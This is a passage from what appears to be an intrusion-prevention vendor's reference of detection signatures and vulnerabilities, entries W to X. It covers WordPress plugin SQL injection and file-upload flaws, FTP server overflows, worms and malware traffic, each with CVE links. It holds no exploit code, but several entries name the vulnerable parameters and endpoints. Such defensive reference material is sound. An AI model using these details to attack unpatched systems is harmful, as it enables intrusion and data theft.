Wordpress-Tutor-Lms-Plugin-Get_instructors-SQL-Injection

About this vulnerability: A vulnerability in WordPress Project Tutor LMS Plugin
Risk: High
First detected in: sgpkg-ips-1838-5242
Last changed: sgpkg-ips-1838-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: An SQL injection vulnerability has been reported in the Tutor LMS Plugin for WordPress. The vulnerability is due to insufficient user input validation of the rating_filter parameter. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to the target server. Successful exploitation could result in arbitrary SQL command execution against the target server's database.
Situation: HTTP_CRL-Wordpress-Tutor-Lms-Plugin-Get_instructors-SQL-Injection
References:
CVE-2024-10400
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10400
Back to top

Wordpress-Ultimate-Member-Plugin-Member_Directory_Meta-SQL-Injection

About this vulnerability: A vulnerability in WordPress Project Ultimate Member Plugin
Risk: High
First detected in: sgpkg-ips-1718-5242
Last changed: sgpkg-ips-1718-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: A time-based blind SQL Injection vulnerability has been reported in Ultimate Member plugin of WordPress. The vulnerability is due to insufficient sanitization of user-supplied data in the sorting parameter. A remote unauthenticated attacker can exploit the vulnerability by sending crafted requests to the server. A successful attack may result in arbitrary SQL command execution against the database on the target server.
Situation: HTTP_CRL-Wordpress-Ultimate-Member-Plugin-Member_Directory_Meta-SQL-Injection
References:
CVE-2024-1071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1071
Back to top

Wordpress-UserPro-Plugin-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in WordPress UserPro plugin
Risk: Moderate
First detected in: sgpkg-ips-1365-5242
Last changed: sgpkg-ips-1365-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: A reflected cross-site scripting vulnerability has been reported in the WordPress UserPro plugin versions up to 4.9.32. Successful exploitation could result in the execution of script code in security context of the target user's browser.
Situation: HTTP_CRL-Wordpress-UserPro-Plugin-Reflected-Cross-Site-Scripting
References:
CVE-2019-14470
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470
Back to top

Wordpress-W3-Total-Cache-PHP-Code-Execution

About this vulnerability: A Wordpress W3 Total Cache PHP Code Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-677-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WordPress W3 Total Cache
Type: PHP Injection
Description: A PHP code execution vulnerability in WordPress W3 Total Cache 0.9.2.8 which allows remote attackers to execute arbitrary PHP code in context of the web server.
Situation: HTTP_CRL-Wordpress-W3-Total-Cache-PHP-Code-Execution
References:
CVE-2013-2010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2010
BID-59316
http://www.securityfocus.com/bid/59316
OSVDB-92652
http://www.osvdb.org/92652
Back to top

Wordpress-WP-Fastest-Cache-Plugin-SQL-Injection-CVE-2023-6063

About this vulnerability: A vulnerability in WordPress WP Fastest Cache plugin
Risk: High
First detected in: sgpkg-ips-1659-5242
Last changed: sgpkg-ips-1659-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: An SQL injection vulnerability has been reported in WP Fastest Cache WordPress plugin versions prior to 1.2.2. An unauthenticated attacker can exploit this vulnerability via a maliciously crafted value of a wordpress_logged_in Cookie.
Situation: HTTP_CSH-Wordpress-WP-Fastest-Cache-Plugin-SQL-Injection-CVE-2023-6063
References:
CVE-2023-6063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6063
Back to top

Wordpress-wp-gdpr-compliance-Plugin-Remote-Code-Execution

About this vulnerability: A vulnerability in Wordpress wp-gdpr-compliance plugin
Risk: High
First detected in: sgpkg-ips-1385-5242
Last changed: sgpkg-ips-1385-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: There exists a vulnerability in WordPress wp-gdpr-compliance plugin, versions prior to 1.4.3. Successful exploitation allows remote attackers to execute arbitrary code.
Situation: HTTP_CRL-Wordpress-wp-gdpr-compliance-Plugin-Remote-Code-Execution
References:
CVE-2018-19207
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19207
Back to top

Wordpress-Wp-Marketplace-Plugin-RCE-CVE-2014-9013

About this vulnerability: A vulnerability in Wordpress WP Marketplace Plugin
Risk: High
First detected in: sgpkg-ips-1322-5242
Last changed: sgpkg-ips-1322-5242
Platform: Generic
Software: Wordpress WP Marketplace Plugin
Type: Input Validation
Description: A vulnerability in Wordpress WP Marketplace Plugin 2.4.0. may allow remote authenticated users to create arbitrary users with admin privileges.
Situation: HTTP_CRL-Wordpress-Wp-Marketplace-Plugin-RCE-CVE-2014-9013
References:
CVE-2014-9013
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9013
Back to top

Wordpress-Wp-Mobile-Detector-File-Upload-Vulnerability

About this vulnerability: A vulnerability in WordPress
Risk: Moderate
First detected in: sgpkg-ips-775-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WordPress WP Mobile Detector Plugin
Type: Malfunction
Description: A vulnerability in the WordPress plugin WP Mobile Detector allows a remote attacker to upload arbitrary files to the affected site.
Situation: HTTP_CSU-Wordpress-Wp-Mobile-Detector-File-Upload-Vulnerability
Back to top

Wordpress-WP-Shortcodes-Plugin-Stored-Cross-Site-Scripting-CVE-2025-0370

About this vulnerability: A vulnerability in WordPress WP Shortcodes Plugin
Risk: Moderate
First detected in: sgpkg-ips-1853-5242
Last changed: sgpkg-ips-1853-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported for the WP Shortcodes Plugin for WordPress. This vulnerability is due to improper input validation on the src parameter. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.
Situation: HTTP_CRL-Wordpress-WP-Shortcodes-Plugin-Stored-Cross-Site-Scripting-CVE-2025-0370
References:
CVE-2025-0370
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0370
Back to top

Wordpress-Wp-Statistics-Plugin-Current_Page_Id-SQL-Injection

About this vulnerability: A vulnerability in WordPress Project WP Statistics
Risk: Moderate
First detected in: sgpkg-ips-1443-5242
Last changed: sgpkg-ips-1443-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Insufficient sanitization of user-supplied data in current_page_id and current_page_type parameters causes an SQL injection vulnerability in WordPress. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Wordpress-Wp-Statistics-Plugin-Current_Page_Id-SQL-Injection
References:
CVE-2022-25148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25148
Back to top

Wordpress-Wp-Statistics-Plugin-Gettop-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in WordPress Project WP Statistics
Risk: High
First detected in: sgpkg-ips-1716-5242
Last changed: sgpkg-ips-1716-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported for the WordPress Plugin WP Statistics. The vulnerability is due to improper validation of user input in the getTop method. A remote, unauthenticated attacker could exploit the vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary script execution in the context of user's browser.
Situation: HTTP_CSU-Wordpress-Wp-Statistics-Plugin-Gettop-Stored-Cross-Site-Scripting
HTTP_CRL-Wordpress-Wp-Statistics-Plugin-Gettop-Stored-Cross-Site-Scripting
References:
CVE-2024-2194
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2194
Back to top

Wordpress-Wp-Statistics-Plugin-IP-SQL-Injection

About this vulnerability: A vulnerability in WordPress Project WP Statistics
Risk: Moderate
First detected in: sgpkg-ips-1444-5242
Last changed: sgpkg-ips-1483-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Insufficient sanitization of user-supplied data causes an SQL injection vulnerability in WordPress. A successful exploit allows an attacker to execute arbitrary SQL on the target system. This situation also covers CVE-2022-25305.
Situation: HTTP_CRL-Wordpress-Wp-Statistics-Plugin-IP-SQL-Injection
References:
CVE-2022-25149
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25149
Back to top

Wordpress-WP-Time-Capsule-Arbitrary-File-Upload

About this vulnerability: An attempt to exploit a vulnerability in WordPress
Risk: Moderate
First detected in: sgpkg-ips-1814-5242
Last changed: sgpkg-ips-1814-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Improper handling of requests sent to the Time Capsule plugin for Wordpress causes an arbitrary file upload vulnerability which allows an attacker to upload PHP code to be executed by the target system.
Situation: HTTP_CS-Wordpress-WP-Time-Capsule-Arbitrary-File-Upload
References:
CVE-2024-8856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8856
Back to top

Wordpress-Wp-Time-Capsule-Plugin-Uploadhandler-Unrestricted-File-Upload

About this vulnerability: A vulnerability in WordPress Project WP Time Capsule
Risk: Moderate
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Improper input validation when handling file upload in UploadHandler.php causes an unrestricted file upload vulnerability in WordPress Time Capsule plugin. A successful exploitation allows an attacker to upload arbitrary files and execute code on the target system.
Situation: HTTP_CS-Wordpress-Wp-Time-Capsule-Plugin-Uploadhandler-Unrestricted-File-Upload
References:
CVE-2024-8856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8856
Back to top

Wordpress-wpDiscuz-Unauthenticated-File-Upload

About this vulnerability: A vulnerability in WordPress wpDiscuz.
Risk: High
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1364-5242
Platform: Generic
Software: WordPress wpDiscuz
Type: Input Validation
Description: A vulnerability in WordPress wpDiscuz, versions 7.0.0 through 7.0.4, which allows remote unauthenticated attackers to upload arbitrary files, including PHP files, and achieve remote code execution.
Situation: HTTP_CS-Wordpress-wpDiscuz-Unauthenticated-File-Upload
References:
CVE-2020-24186
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24186
Back to top

Wordpress-WPS-Hide-Login-Login-Page-Revealer

About this vulnerability: An attempt to exploit a vulnerability in the WPS Hide Login plugin.
Risk: Moderate
First detected in: sgpkg-ips-1434-5242
Last changed: sgpkg-ips-1434-5242
Platform: Generic
Software: WPS Hide Login Plugin
Type: Insecure Configuration
Description: A vulnerability in the WordPress WPS Hide Login plugin, versions 1.9 and before, which allows remote attackers to reveal the hidden path to the login page by sending a GET request to /wp-admin/options.php.
Situation: HTTP_CSU-Wordpress-WPS-Hide-Login-Login-Page-Revealer
References:
CVE-2021-24917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24917
Back to top

Wordpress-Wpvivid-Backup-Plugin-Class-wpvivid-Directory-Traversal

About this vulnerability: A vulnerability in WordPress Project WPvivid Backup Plugin
Risk: Moderate
First detected in: sgpkg-ips-1523-5242
Last changed: sgpkg-ips-1523-5242
Platform: Generic
Software: WordPress
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported for the WordPress WPvivid Backup Plugin. This vulnerability is due to the plugin does not validate the file_name parameter. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. A successful attack may result in arbitrary file read access in the security context of the web server.
Situation: HTTP_CRL-Wordpress-Wpvivid-Backup-Plugin-Class-wpvivid-Directory-Traversal
References:
CVE-2022-2863
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2863
Back to top

Wordpress-Wpvivid-Backup-Plugin-Phar-Insecure-Deserialization

About this vulnerability: A vulnerability in WordPress WPvivid Backup Plugin
Risk: Moderate
First detected in: sgpkg-ips-1725-5242
Last changed: sgpkg-ips-1725-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in WordPress WPvivid Backup Plugin. This vulnerability is due to insufficient path validation of the tree_node[node][id] and tree_node[path] HTTP POST parameters in the "wpvividstg_get_custom_exclude_path_free" and "wpvividstg_get_custom_include_path_free" actions. A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation will result in arbitrary code execution within the security context of the user running the vulnerable WP instance.
Situation: HTTP_CRL-Wordpress-Wpvivid-Backup-Plugin-Phar-Insecure-Deserialization
References:
CVE-2024-3054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-3054
Back to top

Wordpress-Wp_Attached_File-Wp_Crop_Image-Directory-Traversal

About this vulnerability: A vulnerability in WordPress
Risk: Moderate
First detected in: sgpkg-ips-1152-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WordPress
Type: Directory Traversal
Description: Improper processing of a _wp_attached_file Post Meta entry causes a directory traversal vulnerability in WordPress. A successful exploit allows ana attacker to upload files with PHP code that will be executed.
Situation: HTTP_CRL-Wordpress-Wp_Attached_File-Wp_Crop_Image-Directory-Traversal
References:
CVE-2019-8942
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942
Back to top

Worldweaver-DX-Studio-Player-Command-Execution

About this vulnerability: A Worldweaver DX Studio Player Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-725-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Worldweaver DX Studio Player
Type: Input Validation
Description: A vulnerability in Worldweaver DX Studio Player, versions before 3.0.29.1, which allows remote attackers to execute arbitrary commands via a .dxstudio file that invokes the shell.execute JavaScript API method.
Situation: File-Text_Worldweaver-DX-Studio-Player-Command-Execution
References:
CVE-2009-2011
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2011
BID-35273
http://www.securityfocus.com/bid/35273
OSVDB-54969
http://www.osvdb.org/54969
Back to top

Worm-Autorun-Aaeb-H

About this vulnerability: W32/Autorun.worm.aaeb-h
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: W32/Autorun.worm.aaeb-h is a worm that spreads by creating copies of itself in removable storage devices and mounted network shares.
Situation: DNS-UDP_Worm-Autorun-Aaeb-H-Request
DNS-UDP_Worm-Autorun-Aaeb-H-Response-Detected
Back to top

Worm-Nimda

About this vulnerability: Nimda worm
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Nimda
Type: Malfunction
Description: Nimda is a Windows worm that has multiple spread vectors.
Situation: SMB-TCP_CHS-Possible-Nimda-Eml-Spread
SMB-TCP_CHS-Possible-Nimda-Nws-Spread
SMB-TCP_CHS-Possible-Nimda-Riched20-DLL-Spread
TFTP_CS-Admin-DLL-Download-Request
Back to top

WPCargo-Wordpress-Plugin-Arbitrary-File-Write-CVE-2021-25003

About this vulnerability: A vulnerability in WPCargo WordPress plugin
Risk: High
First detected in: sgpkg-ips-1532-5242
Last changed: sgpkg-ips-1532-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: An arbitrary file write vulnerability has been reported in the WPCargo Track & Trace WordPress plugin. Successful exploitation can allow an unauthenticated attacker to create a PHP file in any location on the target server and run arbitrary code.
Situation: HTTP_CRL-WPCargo-Wordpress-Plugin-Arbitrary-File-Write-CVE-2021-25003
References:
CVE-2021-25003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25003
Back to top

WPEverest-WordPess-Plugin-Arbitrary-File-Upload

About this vulnerability: A vulnerability WorpPress
Risk: Moderate
First detected in: sgpkg-ips-1657-5242
Last changed: sgpkg-ips-1657-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Missing file type validation causes a file upload vulnerability in the user registration functionality in the WPEverest WordPess plugin. A successful exploit allows an attacker to upload and execute code on the target system.
Situation: HTTP_CS-WPEverest-WordPess-Plugin-Arbitrary-File-Upload
References:
CVE-2023-3342
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3342
Back to top

WpForo-Wordpress-Plugin-LFI-SSRF-CVE-2023-2249

About this vulnerability: A vulnerability in wpForo WordPress plugin
Risk: High
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1625-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: A local file inclusion and server side request forgery vulnerability has been reported in wpForo plugin for WordPress.
Situation: HTTP_CRL-WpForo-Wordpress-Plugin-LFI-SSRF-CVE-2023-2249
References:
CVE-2023-2249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2249
Back to top

WS-FTP-Server-Multiple-Commands-BOF

About this vulnerability: Multiple commands buffer overflow in WS_FTP server
Risk: High
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows NT; Windows 2000
Software: WS_FTP Server
Type: Buffer Overflow
Description: WS_FTP Server version is vulnerable to a buffer overflow. By sending an FTP command, such as SITE, XMKD, MKD, or RNFR, a remote authenticated attacker could overflow a buffer and cause the FTP server to crash or execute arbitrary code on the system.
Situation: FTP_CS-WS-FTP-Server-Multiple-Commands-Potential-BOF
FTP_CS-WS-FTP-Server-Multiple-Commands-BOF
References:
CVE-2004-1135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1135
BID-11772
http://www.securityfocus.com/bid/11772
Back to top

WSHRAT-Malware-Infection-Traffic

About this vulnerability: WSHRAT malware infection traffic detected
Risk: High
First detected in: sgpkg-ips-1274-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: WSHRAT malware infection traffic was detected.
Situation: HTTP_CRH-WSHRAT-Malware-Infection-Traffic
Back to top

WSO2-Enterprise-Integrator-Validateconnection-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in WSO2 Enterprise Integrator
Risk: Moderate
First detected in: sgpkg-ips-1508-5242
Last changed: sgpkg-ips-1508-5242
Platform: Generic
Software: WSO2
Type: Input Validation
Description: Improper input validation in the /carbon/ndatasource/validateconnection-ajaxprocessor.jsp endpoint causes a cross-site scripting vulnerability in WSO2 Enterprise Integrator. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-WSO2-Enterprise-Integrator-Validateconnection-Reflected-Cross-Site-Scripting
References:
CVE-2022-39810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39810
Back to top

WSO2-SynapseArtifactUploaderAdmin-Directory-Traversal-CVE-2024-7074

About this vulnerability: A vulnerability in multiple WSO2 products
Risk: High
First detected in: sgpkg-ips-1848-5242
Last changed: sgpkg-ips-1848-5242
Platform: Generic
Software: WSO2
Type: Input Validation
Description: A vulnerability in multiple WSO2 products which allows remote attackers to execute arbitrary code on a target server via a directory traversal, due to improper validation of user data sent using the SynapseArtifactUploaderAdmin endpoint.
Situation: File-TextId_WSO2-SynapseArtifactUploaderAdmin-Directory-Traversal-CVE-2024-7074
References:
CVE-2024-7074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7074
Back to top

WSO2-Unrestricted-File-Upload-CVE-2022-29464

About this vulnerability: A vulnerability in WSO2
Risk: High
First detected in: sgpkg-ips-1458-5242
Last changed: sgpkg-ips-1458-5242
Platform: Generic
Software: WSO2
Type: Input Validation
Description: An arbitrary file upload vulnerability has been reported in certain versions of WSO2 API Manager, WSO2 Identity Server, and WSO2 Enterprise Integrator. Successful exploitation of this vulnerability could allow unauthenticated attackers to execute arbitrary code.
Situation: HTTP_CS-WSO2-Unrestricted-File-Upload-CVE-2022-29464
References:
CVE-2022-29464
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29464
Back to top

WU-FTPD-Fnmatch-Function-Asterisk-DoS

About this vulnerability: Denial of service vulnerability in WU-FTPD wu_fnmatch function
Risk: Low
First detected in: sgpkg-ips-22-1210
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: WU-FTPD
Type: Malfunction
Description: Washington University FTP daemon (WU-FTPD) contains a denial of service vulnerability in wu_fnmatch function. A remote attacker could exploit this vulnerability by creating a specially-crafted DIR command with multiple asterisks (*) to cause a denial of service on the vulnerable server.
Situation: FTP_CS-WU-FTPD-Fnmatch-Function-Asterisk-DoS
References:
CVE-2005-0256
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0256
OSVDB-14203
http://www.osvdb.org/14203
Back to top

WU-FTPD-Realpath-Off-By-One-BOF

About this vulnerability: WU-FTPD realpath() off-by-one vulnerability
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WU-FTPD
Type: Buffer Overflow
Description: A remote exploitable off-by-one buffer overflow exists in some versions of the WU-FTPD ftp server. If successfully exploited, the attacker is able to gain remote root access.
Situation: FTP_CS-WU-FTPD-Realpath-Off-By-One-BOF-Linux
FTP_CS-WU-FTPD-Realpath-Off-By-One-BOF-BSD
References:
CVE-2003-0466
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0466
BID-8315
http://www.securityfocus.com/bid/8315
OSVDB-6602
http://www.osvdb.org/6602
Back to top

WU-FTPD-Site-Exec-Format-String-Vulnerability

About this vulnerability: Format String Vulnerabiity in WU-FTPD
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Linux; FreeBSD; SCO; Solaris
Software: WU-FTPD
Type: Format String
Description: Certain versions of WU-FTPD have a format string vulnerability that can be exploited to gain remote root access.
Situation: FTP_CS-Site-Exec
FTP_CS-Site-Exec-WU-Lnx
FTP_CS-Site-Exec-7350wu
FTP_CS-Site-Exec-Lnx-Wu2600
FTP_CS-Site-Exec-FreeBSD
FTP_CS-Site-Exec-Solaris-Sparc
FTP_CS-Site-Exec-FreeBSD-WU-FTPD
FTP_CS-Site-Exec-WU-FTPD-Bobek
References:
CVE-2000-0573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0573
BID-1387
http://www.securityfocus.com/bid/1387
OSVDB-351
http://www.osvdb.org/351
Back to top

WU-IMAP-POP-Login-Buffer-Overflow

About this vulnerability: Buffer overflow in University of Washington imapd
Risk: Critical
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: University of Washington imapd; University of Washington pop2d
Type: Buffer Overflow
Description: A Buffer overflow vulnerability exists in the authentication process of the University of Washington imap and pop2 daemons.
Situation: IMAP_WU-IMAPD-Authenticate-BOF
References:
CVE-1999-0042
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0042
BID-130
http://www.securityfocus.com/bid/130
Back to top

Wwbn-Avideo-Chunkfile-Command-Injection

About this vulnerability: A vulnerability in WWBN AVideo
Risk: Moderate
First detected in: sgpkg-ips-1501-5242
Last changed: sgpkg-ips-1501-5242
Platform: Generic
Software: WWBN AVideo
Type: Input Validation
Description: Improper input validation when executing a command causes a command injection vulnerability in WWBN AVideo. A successful exploit allows an attacker to execute arbitrary commands with the privileges of the target application.
Situation: HTTP_CRL-Wwbn-Avideo-Chunkfile-Command-Injection
References:
CVE-2022-30534
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30534
Back to top

Wwbn-Avideo-Image403-Error-Message-Cross-Site-Scripting

About this vulnerability: A vulnerability in WWBN AVideo
Risk: Moderate
First detected in: sgpkg-ips-1521-5242
Last changed: sgpkg-ips-1521-5242
Platform: Generic
Software: WWBN AVideo
Type: Input Validation
Description: Improper validation on the error message in image403.php causes a cross-site scripting vulnerability in WWBN AVideo. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Wwbn-Avideo-Image403-Error-Message-Cross-Site-Scripting
References:
CVE-2022-30690
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30690
Back to top

Wwbn-Avideo-Wget-Downloadurl-Command-Injection

About this vulnerability: A vulnerability in WWBN AVideo
Risk: Moderate
First detected in: sgpkg-ips-1508-5242
Last changed: sgpkg-ips-1508-5242
Platform: Generic
Software: WWBN AVideo
Type: Input Validation
Description: Improper input validation when constructing a wget command line causes a command injection vulnerability in WWBN AVideo. A successful exploit allows an attacker to execute arbitrary commands on the target system.
Situation: HTTP_CRL-Wwbn-Avideo-Wget-Downloadurl-Command-Injection
References:
CVE-2022-32572
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32572
Back to top

WzdFTPD-Site-Command-Remote-Command-Execution

About this vulnerability: Command execution vulnerability in WzdFTPD
Risk: Moderate
First detected in: sgpkg-ips-40-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WzdFTPD
Type: Metacharacter
Description: There exists a vulnerability in the parsing of SITE command in WzdFTPD. Remote attacker may be able to exploit this vulnerability to execute arbitrary shell commands on the victim server.
Situation: FTP_CS-WzdFTPD-Site-Command-Remote-Command-Execution
References:
CVE-2005-3081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3081
BID-14935
http://www.securityfocus.com/bid/14935
OSVDB-19682
http://www.osvdb.org/19682
Back to top

XAR-Archive-File-Transfer

About this vulnerability: Arbitary XAR archive file transfer
Risk: Low
First detected in: sgpkg-ips-172-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: XAR
Type: Insecure Configuration
Description: XAR, eXtensible ARchiver, is a archiver format used by Mac OS X for installation packages. It may be used to download arbitrary executable content from untrusted sources.
Situation: Shared_CS-XAR-File-Upload
Shared_SS-XAR-Archive-Download
File-Binary_XAR-Archive
Back to top

xArrow-SCADA-HMI-DoS-Ver1

About this vulnerability: A vulnerability in xArrow SCADA control software, decompression NULL pointer, allowing DoS.
Risk: High
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: xArrow
Type: Malfunction
Description: A vulnerability in xArrow SCADA control software. Buffer returned from calloc() is not checked when allocating memory, allowing DoS.
Situation: Generic_CS-xArrow-SCADA-HMI-DoS-Ver1
Back to top

xArrow-SCADA-HMI-DoS-Ver2

About this vulnerability: A vulnerability in xArrow SCADA control software, possible heap corruption, allowing DoS.
Risk: High
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: xArrow
Type: Malfunction
Description: A vulnerability in xArrow SCADA control software. Memory buffer size is not checked. An attacker may use an insufficient memory size, causing a heap corruption, allowing DoS.
Situation: Generic_CS-xArrow-SCADA-HMI-DoS-Ver2
Back to top

xArrow-Webserver-DoS

About this vulnerability: A vulnerability in xArrow Webserver software, allowing DoS.
Risk: High
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: xArrow
Type: Malfunction
Description: xArrow Webserver software, listening on port 80 is vulnerable to a TCP packet starting with \x0a, allowing an attacker to carry out a DoS attack.
Situation: HTTP_CS-xArrow-Webserver-DoS
Back to top

Xarvester-Spambot

About this vulnerability: Xarvester spambot is a template-based spamming engine
Risk: High
First detected in: sgpkg-ips-272-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Xarvester spambot
Type: Backdoor
Description: Xarvester spambot is a template-based spamming engine.
Situation: Generic_CS-Xarvester-Spambot
Back to top

XCSSET-Malware-Traffic

About this vulnerability: XCSSET malware traffic
Risk: High
First detected in: sgpkg-ips-1405-5242
Last changed: sgpkg-ips-1405-5242
Platform: Mac OS
Software: <os>
Type: Backdoor
Description: XCSSET malware targets macOS and has capabilities to exfiltrate information from the compromised device.
Situation: HTTP_CSU-XCSSET-Malware-Traffic
HTTP_CRL-XCSSET-Malware-Traffic-2
Back to top

Xdmcp-Double-Free

About this vulnerability: A vulnerability in Sun Microsystems Solaris
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Solaris 8
Software: <os>
Type: Malfunction
Description: A double-free vulnerability has been reported within the dtlogin daemon, a component of the Common Desktop Environment (CDE), shipped with many enterprise UNIX platforms including Sun's solaris, Hewlett-Packard's HP-UX and Tru64, IBM's AIX, SCO OpenServer, and others. This vulnerability is reported to be exploitable for injection of code which would then run with the privilege of the dtlogin process (normally root).
Situation: Generic_UDP-Xdmcp-Double-Free
References:
CVE-2004-0368
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0368
BID-9958
http://www.securityfocus.com/bid/9958
Back to top

Xen-Project-Xapi-Update-Directory-Traversal

About this vulnerability: A vulnerability in Xen Project XAPI
Risk: Moderate
First detected in: sgpkg-ips-1096-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Xen Project XAPI
Type: Directory Traversal
Description: There has been reported a directory traversal vulnerability in the XAPI component of Xen. A remote attacker can exploit this vulnerability without authentication by sending a maliciously crafted request to the target server. Successful exploitation can lead to arbitrary file read.
Situation: HTTP_URI-Xen-Project-Xapi-Update-Directory-Traversal
References:
CVE-2018-14007
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14007
Back to top

Xerox-Docushare-Resultbackgroundjobmultiple-SQL-Injection

About this vulnerability: A vulnerability in Xerox DocuShare
Risk: High
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Xerox DocuShare
Type: Input Validation
Description: An SQL injection vulnerability has been reported in Xerox DocuShare. The vulnerability is due to insufficient validation of requests sent to ResultBackgroundJobMultiple. A remote attacker can exploit this vulnerability by sending a specially crafted request to the target service. This can result in SQL injection and possibly code execution.
Situation: HTTP_CSU-Xerox-Docushare-Resultbackgroundjobmultiple-SQL-Injection
References:
BID-66922
http://www.securityfocus.com/bid/66922
OSVDB-105972
http://www.osvdb.org/105972
Back to top

XFSP_X-Font-Server-QueryXBitmaps-And-QueryXExtents-Integer-Overflow

About this vulnerability: Buffer overflow vulnerability in the X.Org X Font Server due to an integer overflow
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: XOrg Font Server
Type: Buffer Overflow
